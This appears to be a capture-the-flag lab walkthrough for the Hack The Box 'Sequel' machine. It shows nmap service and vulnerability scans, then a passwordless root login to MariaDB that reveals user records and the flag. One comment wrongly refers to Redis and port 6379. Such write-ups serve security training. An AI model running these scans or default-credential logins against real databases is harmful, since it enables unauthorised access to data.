02.SEQUEL (MYSQL)

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@oco:~$ nmap -sV -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 3306/tcp open  mysql?
 
 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 3306
 PORT   STATE SERVICE VERSION
 3306/tcp open  mysql?
 | mysql-info: 
 |   Protocol: 10
 |   Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
 |   Thread ID: 98
 |   Capabilities flags: 63486
 |   Some Capabilities: Support41Auth, InteractiveClient, Speaks41ProtocolOld, LongColumnFlag, SupportsCompression, SupportsTransactions, IgnoreSigpipes, ConnectWithDatabase, SupportsLoadDataLocal, FoundRows, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, ODBCClient, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
 |   Status: Autocommit
 |   Salt: rq_ju/)~cRQ"RU7Sz-oi
 |_  Auth Plugin Name: mysql_native_password

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 3306
 PORT   STATE SERVICE
 3306/tcp open  mysql

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD/COMPROMISE

Submit root flag
root@htb:~$ which mysql
root@htb:~$ mysql --help
root@htb:~$ mysql -u root -h 10.129.198.75
 MariaDB [(none)]> 
 
 * root is the the superuser account in MySQL, similar to the root user in Unix/Linux 
   systems. It has full privileges on the database server. it is the default for most installations.
    - other possible defaults are mysql & admin
    
MariaDB [(none)]> help;
MariaDB [(none)]> show databases;
 htb
MariaDB [(none)]> use htb;
MariaDB [htb]> show tables;
MariaDB [htb]> select * from users;
 +----+----------+------------------+
 | id | username | email            |
 +----+----------+------------------+
 |  1 | admin    | admin@sequel.htb |
 |  2 | lara     | lara@sequel.htb  |
 |  3 | sam      | sam@sequel.htb   |
 |  4 | mary     | mary@sequel.htb  |
 +----+----------+------------------+
 4 rows in set (0.010 sec)

MariaDB [htb]> select * from config;
 +----+-----------------------+----------------------------------+
 | id | name                  | value                            |
 +----+-----------------------+----------------------------------+
 |  1 | timeout               | 60s                              |
 |  2 | security              | default                          |
 |  3 | auto_logon            | false                            |
 |  4 | max_size              | 2M                               |
 |  5 | flag                  | 7b4bec00d1a39e3dd4e021ec3d915da8 |
 |  6 | enable_uploads        | false                            |
 |  7 | authentication_method | radius                           |
 +----+-----------------------+----------------------------------+
 7 rows in set (0.010 sec)
Previous01.APPOINTMENT (SQL INJECTION)Next03.CROCODILE (FTP & WEB FORM LOGIN)

Last updated